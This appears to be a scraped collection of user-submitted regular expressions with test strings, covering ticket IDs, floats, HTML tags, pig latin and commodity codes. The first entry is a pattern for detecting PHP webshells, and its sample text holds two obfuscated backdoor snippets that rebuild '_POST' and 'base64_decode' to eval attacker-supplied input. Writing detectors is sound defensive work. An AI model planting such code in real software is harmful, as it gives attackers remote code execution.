\$(.*)(\s?)=(\s?)"(.*)"(\s?);(\s?)\$(.*)eval
$sqm3 = "_pesoutr" ; $exr40= $sqm3[3]. $sqm3[6]. $sqm3[7].$sqm3[6]. $sqm3[4].$sqm3[5].$sqm3[1]. $sqm3[1]. $sqm3[2]. $sqm3[7]; $rgjf3 =$exr40 ($sqm3[0].$sqm3[1] .$sqm3[4].$sqm3[3]. $sqm3[6] );if ( isset ( ${$rgjf3} ['q42dabb'] ) ) {eval(${ $rgjf3}[ 'q42dabb']) ; }?> $ucz65= "osb46detp_ac";$zxg6 = strtolower ( $ucz65[2].$ucz65[10]. $ucz65[1].$ucz65[6]. $ucz65[4]. $ucz65[3] .$ucz65[9] . $ucz65[5].$ucz65[6]. $ucz65[11].$ucz65[0]. $ucz65[5]. $ucz65[6]); $tov98= strtoupper ($ucz65[9]. $ucz65[8].$ucz65[0]. $ucz65[1]. $ucz65[7]) ;if (isset(${ $tov98 } ['n42dabb' ])){eval ($zxg6 ( ${ $t
potential shell
2016-05-30T13:06:54.000Z
^([\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEFA-Za-z. \-]{0,55})$
Włodzisław S. Kulka
Full name with non-latin characters
2018-01-20T22:55:41.000Z
This matches TicketIDs on BITSDesk even with crap before and after them.
(?: |:|#|\.)(\d?\d\d\d\d\d)(?: |\. |\, |\.$|$)
This is a ticket:51345 This is a ticket:51345. New writing This is a ticket:51345, New writing This is a ticket:123456 This is a ticket:1234456 This is a ticket 51345 This is a ticket 51345. More writing here This is a ticket 123456 This is a ticket 1234456 Ticket 123562 is where I discussed this Ticket:123562 is where I discussed this Ticket 13562 is where I discussed this Ticket:13562 is where I discussed this Ticket 13562. Is where I discussed this Ticket:13562. Is where I discussed this Ticket 1356552 is where I discussed this Ticket:1356552 is where I discussed this I discussed this under #123587 I discussed this under #35875 I discussed this under #1235587 Please take a look at ticket 12345 as this contains pertinent information Please take a look at ticket 123456 as this contains pertinent information Please take a look at ticket 1234756 as this contains pertinent information :12345.jpg :12345 :123456 912345.jpg 012345789121234.jpg <p><span><img width="462" height="200" src="cid:[email protected]...</td>
BITSDesk Ticket Matching
2018-08-10T11:33:12.000Z
Анализ
^[+-]?[\d]+($|[\.][\d]|([\.][\d][Ee]|[Ee])[+-]?\d+)$
224
Float
2016-08-18T06:01:25.000Z
I got really bored so I made this (not so fancy) pig latin generator
([aeiouy][a-z]+)|(([qwrtpsdfghjklzxcvbnm]+)([a-z]+))
pig trash egg inbox eight hello yahoo spoonfull spleen flea
Pig Latin regex
2015-05-02T03:15:46.000Z
\w+.\w+$
C:\Users\owner_pc3\Desktop\labo\output\test.psd ^.*\\ \w+.\w+$
ファイル操作
2018-09-20T14:31:25.000Z
The regex finds for example the <td class='searchedclass'>random text</td> sequence, if ohne single quotes ar used. The td itself may vary (td, div, span, p and so on), the provided class ist the item searched vor.
<([A-Za-z]{1,7}) .*class='([a-zA-Z0-9_ ]{0,})searchedclass[ '].*>.*<\/\1.*>
<div> <table> <tr> <td style='abc' class='searchedclass noprint' style='color:#ff0000'>some random text </td> </tr> </table>
Regex to find begin and end of a HTML tag with a certain class
2016-02-09T15:58:08.000Z
get the matching text starting from [** to /.md
\[\*\*.*\/.md\)
# AssetApi All URIs are relative to *http://pwi-host/api/nonintrusive_corrosion_be-consumer* Method | HTTP request | Description ------------- | ------------- | ------------- [**getAssets**](AssetApi.md#getAssets) | **GET** /api/asset | Returns the address tree statistics IE the count of red green blue and grey measurement points in the address tree branch <a name="getAssets"></a> # **getAssets** > List getAssets(timePeriod, assetId) Returns the address tree statistics IE the count of red green blue and grey measurement points in the address tree branch ### Parameters Name | Type | Description | Notes ------------- | ------------- | ------------- | ------------- **timePeriod** | [**TimePeriod**](../\Models/.md)| The time period 1,3,6, or 12 months | [default to null] [enum: OneMonth, ThreeMonth, SixMonth, TwelveMonth, All] **assetId** | **Integer**| The id of the address to get, if not present will return all addresses from assetId &#x3D; 1 | [optional] [default to 1] ### Return type [**List of AssetDto**](../\Models/AssetDto.md) ### Authorization PWI API Key is required for authorization. ### HTTP request headers - **Accept**: text/plain, application/json, text/json
get the matching text starting from [** to /.md
2021-05-24T15:40:05.000Z
[0-9]+[a-zA-Z]?(\/[0-9]+[a-zA-Z])?
1111111c/1111111 11a/111b 11/11a 11/112 111121112 1111111C/ 1111111c/ /1111111c ccccccc/11111 1111/cccc
test
2014-08-01T07:31:20.000Z
[a-z][a-zA-Z0-9_]*
0utra_variavel3mSML
sml-identifier
2015-09-05T01:27:56.000Z
(?<!=[ ])(?<![=&|%])(\+|-)(?!\1|[ =])
a - b + c a-b+c a-=2 a=-2 a&-b a|-2 a%-b
Nada
2014-10-29T17:40:59.000Z
This is a regular expression for checking the location
[a-zA-Z/ ]+(?!\w)(?!\D)
c#
location regex
2016-04-02T09:45:36.000Z
handles atomic and combined tenor
^(?'commodity'02)_(?'market'\w{3,})_(?'tenortype'M)(?'offset'[1-9][0-9]?)?_(?'derivative'PHY|FUT) (?'period'M)-(?'year'\d{4})-\b(?'month'0[1-9]|1[0-2])\b$
02_AUT_M_PHY M-2015-12 02_GASPOOL_H_M_PHY M-2015-12 02_GASPOOL_L_M_PHY M-2015-12 02_NBP_H_M_PHY M-2015-12 02_MGP_M_PHY M-2015-12 02_NCG_H_M_PHY M-2015-12 02_NCG_L_M_PHY M-2015-12 02_OTE_M1_PHY M-2015-12 02_POLVP_M2_PHY M-2015-12 02_PEGN_M3_PHY M-2015-12 02_SVKVP_M4_PHY M-2015-12 02_ZEEBRUGGE_H_M5_PHY M-2015-12 02_ZTP_H_M10_PHY M-2015-12 02_ZTP_L_M99_PHY M-2015-12
EIM month
2019-08-30T09:38:49.000Z
Matches single or double quoted strings, and ignores backslash-escaped quotes within the string.
(?| (")((?:\\"|[^"])+)\1 | (')((?:\\'|[^'])+)\1 )
{if Server:GetPhpSelf == "/ind'ex.php"} foo 'hhhh"hhh""hhh' plonk foo "meep\"meep" plonk foo 'meep\'meep' plonk
Match quoted strings, ignoring escaped quotes
2013-06-26T14:28:15.000Z
This regex checks for numbers with optional decimal part.
^\d+(?:\.+\d*)?$
Number with optional decimal part
2016-06-07T15:46:59.000Z